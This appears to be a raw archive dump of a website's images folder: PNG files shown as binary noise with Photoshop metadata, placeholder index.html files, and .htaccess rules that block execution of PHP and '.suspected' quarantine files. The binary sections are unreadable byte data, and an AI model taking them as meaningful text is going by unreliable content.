UEe�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:FE22B85259C211E385BBFCC2CFBC267A" xmpMM:DocumentID="xmp.did:FE22B85359C211E385BBFCC2CFBC267A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FE22B85059C211E385BBFCC2CFBC267A" stRef:documentID="xmp.did:FE22B85159C211E385BBFCC2CFBC267A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��XR�IDATx�b���'/g1@:��	�+���k�b�|��OA�
��q&>U12����>M,aQ ��8�4��U��6�����RN��x�Cߧ�8�������h���֩����H0ˈ�@|���Ou��H�#���|����3ѡ�x%IEND�B`�images/10/02/index.html000060400000000042152434416630010447 0ustar00<!DOCTYPE html><title></title>
images/10/02/.htaccess000044400000000424152434416630010256 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/10/02/upload.png000060400000003507152434416630010455 0ustar00�PNG


IHDR) �oQ>tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:35A9794A52A011E3A0DFEE45FEA3B7A2" xmpMM:DocumentID="xmp.did:35A9794B52A011E3A0DFEE45FEA3B7A2"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:35A9794852A011E3A0DFEE45FEA3B7A2" stRef:documentID="xmp.did:35A9794952A011E3A0DFEE45FEA3B7A2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>����IDATx��X�RAm.�x�\��R���=�I�|��O1b��UQAKEK��C-Vv]-�j�vaw�L���=c*
���<OD_x�P�X������7���Ҽ���Ũ���a���Q<�㓓3<�ha�\��=�P	��z?�L�T�����36���� 2�ͺ���b�;;;��������Y`���5]˻����t���	����8���q�=<<�<�kmM,��pC?�2�9	�����䠚���ҏ�jq8�L&񛃯{{{��C��5A����o擑���H�<���f��;?���q�X,�f�Z�n�Skk+���PSS��w1����GŊ���tRxp����PP"ϔ����zy����5�459)�Pi���1<L>��~�������2-A҃���@d}jwWx�%����"��&.�~;�&����E���hvf�\.��<
��P1�>uv��|>O[[[eFx\�^^^Ľ��~�'u�D��\\]]U�M�����F�T�
	P�K��jBl�H)B1@֗%
�����@�!����y����=����h�>���TW�+in0<����� gr����x��~�0���*J����АXL``�v���'�(�LR$���0*���fY�M(J �?8<��� ev��429���f��?=;+3��4)�btd�f�V��;�#.�/� 2�*�R�Jm����
N�D�Rme���PUm�lJ/C[�n^���Um�j�
�mӢ\�Q&�S��R[!�j|T�d�7P6�9$�D��c�hD�9T���t����*��IP�gp
�Hh�$����(C�NW�A�P�я��ټ!��<���rfx��Ր,��C�Bɺ���7�e��O1�!A��Zv����b|}��6�#��u>S��o�x��k ��ţ��.ж��!�IEND�B`�images/10/index.html000060400000000042152434416630010226 0ustar00<!DOCTYPE html><title></title>
images/10/previous.png000060400000002154152434416630010621 0ustar00�PNG


IHDR
UEe�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:FA90D80759C111E3B4D69BC3BE0FC11B" xmpMM:DocumentID="xmp.did:FA90D80859C111E3B4D69BC3BE0FC11B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FA90D80559C111E3B4D69BC3BE0FC11B" stRef:documentID="xmp.did:FA90D80659C111E3B4D69BC3BE0FC11B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>����IDATxڴԭ
�P��m.�i�
lZ�=�~%����v�`�hj�4�y&� X48��38X;�_xV8{y� ,������Zf&����D��<��AW�oݥ6ʨ��*"7E�\ͅ�x��(I�&�l]S�-\QT���1���d#��v����FJ��a�NJ6R^���쥜5Q�)lE^�㠽4*��(�7)�i�Cg��b�9��8l���IEND�B`�images/10/01/upload.png000060400000007652152434416630010461 0ustar00�PNG


IHDR) �oQ>	pHYs��
OiCCPPhotoshop ICC profilexڝSgTS�=���BK���KoR RB���&*!	J�!��Q�EEȠ�����Q,�
��!��������{�kּ�����>�����H3Q5��B������.@�
$p�d!s�#�~<<+"��x��M��0���B�\���t�8K�@z�B�@F���&S�`�cb�P-`'������{[�!�� e�Dh;��V�EX0fK�9�-0IWfH�����0Q��){`�##x��F�W<�+��*x��<�$9E�[-qWW.(�I+6aa�@.�y�2�4�������x����6��_-��"bb��ϫp@�t~�,/��;�m��%�h^�u��f�@����W�p�~<<E���������J�B[a�W}�g�_�W�l�~<�����$�2]�G�����L�ϒ	�b��G�����"�Ib�X*�Qq�D���2�"�B�)�%�d��,�>�5�j>{�-�]c�K'Xt���o��(�h���w��?�G�%�fI�q^D$.Tʳ?�D��*�A�,����`6�B$��BB
d�r`)��B(�Ͱ*`/�@4�Qh��p.�U�=p�a��(��	A�a!ڈb�X#����!�H�$ ɈQ"K�5H1R�T UH�=r9�\F��;�2����G1���Q=��C��7�F��dt1�����r�=�6��Ыhڏ>C�0��3�l0.��B�8,	�c˱"����V����cϱw�E�	6wB aAHXLXN�H� $4�	7	�Q�'"��K�&���b21�XH,#��/{�C�7$�C2'��I��T��F�nR#�,��4H#���dk�9�, +ȅ����3��!�[
�b@q��S�(R�jJ��4�e�2AU��Rݨ�T5�ZB���R�Q��4u�9̓IK�����hh�i��t�ݕN��W���G���w
��Ljg(�gw��L�Ӌ�T071���oUX*�*|��
�J�&�*/T����ުU�U�T��^S}�FU3S�	Ԗ�U��P�SSg�;���g�oT?�~Y��Y�L�OC�Q��_�� c�x,!k
��u�5�&���|v*�����=���9C3J3W�R�f?�q��tN	�(���~���)�)�4L�1e\k����X�H�Q�G�6����E�Y��A�J'\'Gg����S�Sݧ
�M=:��.�k���Dw�n��^��Lo��y��}/�T�m���GX�$��<�5qo</���QC]�@C�a�a�ᄑ��<��F�F�i�\�$�m�mƣ&&!&KM�M�RM��)�;L;L���͢�֙5�=1�2��כ߷`ZxZ,����eI��Z�Yn�Z9Y�XUZ]�F���%ֻ�����N�N���gð�ɶ�����ۮ�m�}agbg�Ů��}�}��=
���Z~s�r:V:ޚΜ�?}���/gX���3��)�i�S��Ggg�s�󈋉K��.�>.���Ƚ�Jt�q]�z�������ۯ�6�i�ܟ�4�)�Y3s���C�Q��?��0k߬~OCO�g��#/c/�W�װ��w��a�>�>r��>�<7�2�Y_�7��ȷ�O�o�_��C#�d�z����%g��A�[��z|!��?:�e����A���AA�����!h�쐭!��Α�i�P~���a�a��~'���W�?�p�X�1�5w��Cs�D�D�Dޛg1O9�-J5*>�.j<�7�4�?�.fY��X�XIlK9.*�6nl�������{�/�]py�����.,:�@L�N8��A*��%�w%�
y��g"/�6ш�C\*N�H*Mz�쑼5y$�3�,幄'���L
Lݛ:��v m2=:�1����qB�!M��g�g�fvˬe����n��/��k���Y-
�B��TZ(�*�geWf�͉�9���+��̳�ې7����ᒶ��KW-X潬j9�<qy�
�+�V�<���*m�O��W��~�&zMk�^�ʂ��k�U
�}����]OX/Yߵa���>������(�x��oʿ�ܔ���Ĺd�f�f���-�[����n
�ڴ
�V��E�/��(ۻ��C���<��e����;?T�T�T�T6��ݵa�n��{��4���[���>ɾ�UUM�f�e�I���?�����m]�Nmq����#�׹���=TR��+�G�����w-
6
U����#pDy��	�
:�v�{���vg/jB��F�S��[b[�O�>����z�G��4<YyJ�T�i��ӓg�ό���}~.��`ۢ�{�c��jo�t��E���;�;�\�t���W�W��:_m�t�<���Oǻ�����\k��z��{f���7���y���՞9=ݽ�zo�����~r'��˻�w'O�_�@�A�C݇�?[�����j�w����G�������C���ˆ
��8>99�?r��C�d�&����ˮ/~�����јѡ�򗓿m|�����������x31^�V��w�w��O�| (�h���SЧ�������c3-� cHRMz%������u0�`:�o�_�F�IDATx�̘iLTg��;�# 8B�Z�Nu*ո��jUB
ֶ��%������&�VS��D[�bcB-�
�FE#.�8*(�,�:��,�!�!Ȍ`���1�~�s�=�=���t���X
�3t�5 ���tA�d�>z����ID��2�7�<䇴l
n�n4K��sv�|��Q�h&��
F	0$��t2w7h���W9��-H$B���/)scI��L*q�mȴ#W�u�R�s����rKgG�
����*7�~����wʧ��ip!�����|��$��~R����~=��a��߀�n��ɑ�%�}����
A"`�٩�5��fu��K��M��H��N'A���ӿ��P�2�������fK�Պ�
jȻz���JR?��R!s�ug���U3&З����(]Z{�T�n?uݒM��: |���?�C�p�����g�*(%3��:Sk���eH���15?!��H��[%^SȥL�gb�?3�Ƴn�QT5�:�_��ז ���#�i�\�Fi%��^%3���Z�h�mk��x-_v[�W-���-�ǃ�i�<w�qA~�r>QF2),��q���7�Y1����v ��&�e��+���%:mvޏ�Z�tr��
�R@ٓ�^u�QU#�f:_/$��f!-�V��6���
��V�W�;<ki��R��J<U����il#64$�e�݋�����E��;=�X�<���Q*'plv�'n05f,��?�I�Xg���K�$iz��`T5r�jY��b�b=J���gEq�����ٓ]��$=2����$ψ���~�[� uŋ�.�=�^����s�!~κ@E���K��{���a���jvd�s��ۚ���DM)VC~Z5�NA�����G=�p:�:]̩��L
!p�7v�����\�����	Q�Y�0^�׏�Ml�dKgGc���ۢ�Mm��|���[ͦ��Pȥ�U�-���V"C�7�\�zt/�;�e��&>NG����}�im��;��ا?�iɔ9��Tq��>
f�i�B&E.��n�aw8zu��)1cH�+B���9%�F��rA��2��ES�X45l����o �x�o�Ǯ3+~!:����\��5����y*�؝]08�Rۤ��
���f�F��-u�(z+�u� ��ϠB.K�aYb�Kk�u&�J	��q{���!�ڸ= M�j�m�j�����������{�~IEND�B`�images/10/01/index.html000060400000000042152434416630010446 0ustar00<!DOCTYPE html><title></title>
images/10/01/.htaccess000044400000000424152434416630010255 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/10/.htaccess000044400000000424152434416630010035 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/section_break.png000060400000004660152434416630011341 0ustar00�PNG


IHDR**���[tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:131394FCC7F611E49922A216D8CF7011" xmpMM:DocumentID="xmp.did:131394FDC7F611E49922A216D8CF7011"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:131394FAC7F611E49922A216D8CF7011" stRef:documentID="xmp.did:131394FBC7F611E49922A216D8CF7011"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��Z�%IDATx��Y{P�U���*����
��)�hV���3M��GjcΈo�f2G��J���3�%�,љ�菚��j�шN����� �c_��v���U�w���o��w߹�{ι�S�}�5=aa!��H��	�UB������)�$�",$,#� (�x����q�_�a�ß�}mHAH%\!|Gx�O��-"�w�É�,���oD���O�C?�R�R�,GNK��3Q�泄�!��1���g�aI_��'"� ��w�Z5�mh����@�폆�h��:d��c�?D>� XX(ީ��J_��"d
�'�y6:{���䞈2�o!D�h�IJ@�K���ѥ��[�Dt�k�<����,�|���4��v��q�-3��`
��������n1��\MH���u�
s���*����"T�,}@@�Ô���>o{0sC�s;�Z�����L�.�,��q��deɗ(�߈�v�A9�SD��v�QT���{
I��r���h����#��X�"u�|�O�t��.�|0ڸ-��(���s�v�_���9�ǯ"���e(/�)<�h/��p��9�si�I�c�Q��7q7՝r�t[�<l<yx� oi*�o�bœgDev���x��v�5ht�I�*"w���cM�h�^F$[dӨk�?9)��L�	oV�~����a|dL�%��?v'�E�ZQ��v�4�zL��D�x{�Jh�l�H�Ԥ{�kbQ[�C׳�ʥQ��G2QO��5MP��I܀p�bA�n)CME6*�~�ErZ[;j�^�L�ї
) 0�m�������,�cJ_˸� �J���龕i/@����QѡҌQw/�~�%4�h��Du��_��[|���f�P&j�6��ʡ3�<�6s1�N@�M@ܘt�����ke��hm�M��D/y�L�����u�o�Q��8���H���/d��fJ�/=IXӍ�q
Z��(����&�O� ����")�IY��*����D��RL����fc�I7ɮ���r}2�c�������/��m3�$��K2�R4�-�B{�U�]���6K	�o�U�+.��\D�=���
�ߨ��9~7u�Q3�-���ŷE�˩ѫ&��7PRr���Cv��=�o����D�������0USqX\�3�s��}7�ŵwW�R�vR���`m�t�u�
upZ�U"��h�[�rh���n7�`_﹚���t`@���@�Ն��b�)#~���P'�\B�&IN�s��H�]$�-@\�ٱ�]�9ϞG�QJ�e=.�h�8�dƻ���F�gi��(�^#o��H�V�г�+�سrp2"��}^v�6J_kI�V��#��ز*
�K$��^ȥ�Ufnf�nd����ʦ/M�"���ԉ8�1S.�`+� ��P��+����B�D����ݟ�"�=b��h�<�&�Ͽ"��ϑJ߃ߥ`^uw�7�l3�*+�W0�?���$k5�
B�`
Mn�-�=�D����~9��?�Rf)-����}�!ƤU�4��I`/s�og/r!&�I�i�ˈ�˸w0EIEND�B`�images/select.png000060400000003755152434416630010014 0ustar00�PNG


IHDR**���[tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:05317441C7F611E4A6BAAF04CE824364" xmpMM:DocumentID="xmp.did:05317442C7F611E4A6BAAF04CE824364"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0531743FC7F611E4A6BAAF04CE824364" stRef:documentID="xmp.did:05317440C7F611E4A6BAAF04CE824364"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>=�CbIDATx��Y[lU�fw�n�Rŀ�IM��D�A���G
$�	Ml}0��Qb��Q��!ź�B�(��H���E(-E�����֥���Ύ߿�
`��ݝ���wfv��o�/�G�k+��T�ˉ��������O��X��)Y-!�&��z–��a�b/1����_h$�$� ͒dj,y�ϡ�4�y��y#�T_:7Q�|��[�(mP�c��M�e>N<�B�]Y��=���`��Fb���Xf�����GnNw��� 2M���B`ZA��P�D����)���E���\K��h+
����X��j#�B����E�@uEv�^>��
f�Y��m��6�#*�
XI�8_F�@U�C?>��3?��n�Ws�i��'�fW�\>�
�W7����a^Km�d!�l��4Qm˩�:.v�e�J�-K_M���i�ê���tԕ�c�Će�..�|V�Eeu�2��]�&��.DŘn��M���GOn��Q6g�H<���oA�o���Pna[n�S����A�ـA߈a?�/�r"9/�K�3۸����wdz�<s0�}�.�����J����Q���k;����O��kr��r]�s�ZHܿC��{��w��8:܋�O���߼�.����[U�z��|<S��m_�_��k��ҟ��{���lcB�gK�EO�
уIM��h��ͣ_��G,I3����忄hj�ך���H_�[4�ПYlj�>��G�SD�p��a0���wn���T�1t���թ�4��-K-�h�c���}�&w��FB��X�_}
)S2
����4�
��2����&�99[�,b�EtW<��q��ϽF���ށ��fQhN���+�<;�ٌ�U{b�o�Q/X��SyG�xx�x)_�zɍ���1|�s�Z[)��o��}:ɉ�Y�qbՊ!=��t���]���s ������^!;���O��<�
ǝ��h��/�>�{�}�\�s$�7�H��*"� )�,v�cv��~��=��N��Nw�c���<Q��^1�E�
��.�P������W
�V�����0�ԽXb�优����W�OM&c�LX�ya�^K�DOc�C�S�-�R\`�|[��&�3n0r�?I$p�5>bIEND�B`�images/plus_hover.png000060400000046160152434416630010720 0ustar00�PNG


IHDR''��b	pHYs��
OiCCPPhotoshop ICC profilexڝSgTS�=���BK���KoR RB���&*!	J�!��Q�EEȠ�����Q,�
��!��������{�kּ�����>�����H3Q5��B������.@�
$p�d!s�#�~<<+"��x��M��0���B�\���t�8K�@z�B�@F���&S�`�cb�P-`'������{[�!�� e�Dh;��V�EX0fK�9�-0IWfH�����0Q��){`�##x��F�W<�+��*x��<�$9E�[-qWW.(�I+6aa�@.�y�2�4�������x����6��_-��"bb��ϫp@�t~�,/��;�m��%�h^�u��f�@����W�p�~<<E���������J�B[a�W}�g�_�W�l�~<�����$�2]�G�����L�ϒ	�b��G�����"�Ib�X*�Qq�D���2�"�B�)�%�d��,�>�5�j>{�-�]c�K'Xt���o��(�h���w��?�G�%�fI�q^D$.Tʳ?�D��*�A�,����`6�B$��BB
d�r`)��B(�Ͱ*`/�@4�Qh��p.�U�=p�a��(��	A�a!ڈb�X#����!�H�$ ɈQ"K�5H1R�T UH�=r9�\F��;�2����G1���Q=��C��7�F��dt1�����r�=�6��Ыhڏ>C�0��3�l0.��B�8,	�c˱"����V����cϱw�E�	6wB aAHXLXN�H� $4�	7	�Q�'"��K�&���b21�XH,#��/{�C�7$�C2'��I��T��F�nR#�,��4H#���dk�9�, +ȅ����3��!�[
�b@q��S�(R�jJ��4�e�2AU��Rݨ�T5�ZB���R�Q��4u�9̓IK�����hh�i��t�ݕN��W���G���w
��Ljg(�gw��L�Ӌ�T071���oUX*�*|��
�J�&�*/T����ުU�U�T��^S}�FU3S�	Ԗ�U��P�SSg�;���g�oT?�~Y��Y�L�OC�Q��_�� c�x,!k
��u�5�&���|v*�����=���9C3J3W�R�f?�q��tN	�(���~���)�)�4L�1e\k����X�H�Q�G�6����E�Y��A�J'\'Gg����S�Sݧ
�M=:��.�k���Dw�n��^��Lo��y��}/�T�m���GX�$��<�5qo</���QC]�@C�a�a�ᄑ��<��F�F�i�\�$�m�mƣ&&!&KM�M�RM��)�;L;L���͢�֙5�=1�2��כ߷`ZxZ,����eI��Z�Yn�Z9Y�XUZ]�F���%ֻ�����N�N���gð�ɶ�����ۮ�m�}agbg�Ů��}�}��=
���Z~s�r:V:ޚΜ�?}���/gX���3��)�i�S��Ggg�s�󈋉K��.�>.���Ƚ�Jt�q]�z�������ۯ�6�i�ܟ�4�)�Y3s���C�Q��?��0k߬~OCO�g��#/c/�W�װ��w��a�>�>r��>�<7�2�Y_�7��ȷ�O�o�_��C#�d�z����%g��A�[��z|!��?:�e����A���AA�����!h�쐭!��Α�i�P~���a�a��~'���W�?�p�X�1�5w��Cs�D�D�Dޛg1O9�-J5*>�.j<�7�4�?�.fY��X�XIlK9.*�6nl�������{�/�]py�����.,:�@L�N8��A*��%�w%�
y��g"/�6ш�C\*N�H*Mz�쑼5y$�3�,幄'���L
Lݛ:��v m2=:�1����qB�!M��g�g�fvˬe����n��/��k���Y-
�B��TZ(�*�geWf�͉�9���+��̳�ې7����ᒶ��KW-X潬j9�<qy�
�+�V�<���*m�O��W��~�&zMk�^�ʂ��k�U
�}����]OX/Yߵa���>������(�x��oʿ�ܔ���Ĺd�f�f���-�[����n
�ڴ
�V��E�/��(ۻ��C���<��e����;?T�T�T�T6��ݵa�n��{��4���[���>ɾ�UUM�f�e�I���?�����m]�Nmq����#�׹���=TR��+�G�����w-
6
U����#pDy��	�
:�v�{���vg/jB��F�S��[b[�O�>����z�G��4<YyJ�T�i��ӓg�ό���}~.��`ۢ�{�c��jo�t��E���;�;�\�t���W�W��:_m�t�<���Oǻ�����\k��z��{f���7���y���՞9=ݽ�zo�����~r'��˻�w'O�_�@�A�C݇�?[�����j�w����G�������C���ˆ
��8>99�?r��C�d�&����ˮ/~�����јѡ�򗓿m|�����������x31^�V��w�w��O�| (�h���SЧ�������c3-�=CiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        ">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:xmp="http://ns.adobe.com/xap/1.0/"
            xmlns:dc="http://purl.org/dc/elements/1.1/"
            xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"
            xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"
            xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
            xmlns:tiff="http://ns.adobe.com/tiff/1.0/"
            xmlns:exif="http://ns.adobe.com/exif/1.0/">
         <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>
         <xmp:CreateDate>2015-11-20T13:09:21+04:00</xmp:CreateDate>
         <xmp:ModifyDate>2015-11-20T19:56:29+04:00</xmp:ModifyDate>
         <xmp:MetadataDate>2015-11-20T19:56:29+04:00</xmp:MetadataDate>
         <dc:format>image/png</dc:format>
         <photoshop:ColorMode>3</photoshop:ColorMode>
         <photoshop:ICCProfile>sRGB IEC61966-2.1</photoshop:ICCProfile>
         <photoshop:DocumentAncestors>
            <rdf:Bag>
               <rdf:li>adobe:docid:photoshop:3ff1f1b3-8c7a-11e5-908b-ca098794a1d9</rdf:li>
               <rdf:li>adobe:docid:photoshop:87fd4ba7-8c73-11e5-908b-ca098794a1d9</rdf:li>
               <rdf:li>adobe:docid:photoshop:d31096f8-8dc8-11e5-908b-ca098794a1d9</rdf:li>
               <rdf:li>xmp.did:90eaadfa-1016-ed46-82dd-4ae7a991a8dc</rdf:li>
               <rdf:li>xmp.did:f562aca2-fc36-4c47-8294-8d2eaade51e7</rdf:li>
            </rdf:Bag>
         </photoshop:DocumentAncestors>
         <xmpMM:InstanceID>xmp.iid:78cb63e7-6337-d441-8b3f-171bb48aa4b9</xmpMM:InstanceID>
         <xmpMM:DocumentID>adobe:docid:photoshop:35fd889f-8f9f-11e5-94a6-ee3452282a2a</xmpMM:DocumentID>
         <xmpMM:OriginalDocumentID>xmp.did:555fc4b2-387a-024c-a2fb-d772c7607381</xmpMM:OriginalDocumentID>
         <xmpMM:History>
            <rdf:Seq>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>created</stEvt:action>
                  <stEvt:instanceID>xmp.iid:555fc4b2-387a-024c-a2fb-d772c7607381</stEvt:instanceID>
                  <stEvt:when>2015-11-20T13:09:21+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>converted</stEvt:action>
                  <stEvt:parameters>from application/vnd.adobe.photoshop to image/png</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:78cb63e7-6337-d441-8b3f-171bb48aa4b9</stEvt:instanceID>
                  <stEvt:when>2015-11-20T19:56:29+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
            </rdf:Seq>
         </xmpMM:History>
         <tiff:Orientation>1</tiff:Orientation>
         <tiff:XResolution>720000/10000</tiff:XResolution>
         <tiff:YResolution>720000/10000</tiff:YResolution>
         <tiff:ResolutionUnit>2</tiff:ResolutionUnit>
         <exif:ColorSpace>1</exif:ColorSpace>
         <exif:PixelXDimension>39</exif:PixelXDimension>
         <exif:PixelYDimension>39</exif:PixelYDimension>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                            
<?xpacket end="w"?>3�� cHRMz%������u0�`:�o�_�FLIDATx��KS�VǏ������e�$��P�1�-���i��3]t�Mw��B�u�E��f�ݴ�cJIh��M����-K�$K֣0&`�c�]i�����y��1����/�ź�^P/�ϳ�G1
�b�n��(�ڮ�=���g�bJ��1�����ѳĮW�7	�����o��o�;5aFL
�WH�@���Z�eC�v�5x9'w��x׵�b���$pb?�"�濄(�J��E�6���}����W��#C}����[��|WSW?����;�V�KV�ώ��x-��S\�8�x�����EŚ-��P{*�,)�����S�� *o��}#�]�+K�[93c�1F>)�4��#qi��$�a�	Q��f���\7|�
a�hK�>�J����!p����Fd�>��ZX�LHݒ2���}�$�0K�[K��3QX��
}v�	@��I$�_�F$Mlc��6uK�����m<i�\�I���Tf,/��x�AV��Y|�^fx9����W���(�j�A���
SW�ᤁ}d)7���Jb6��)*�Iί��K[��bt���1W��<��{�+o~��vWHm�[$���c�����4�贖ȼ.e&Z6}�\Q�$#�GA��f�0%��QD6*52K�V�w��i�[5k�f�qL�t�9T�ԏPL�N� �����ߤ��e#�s��ޝ0�r�D����_7qLh����
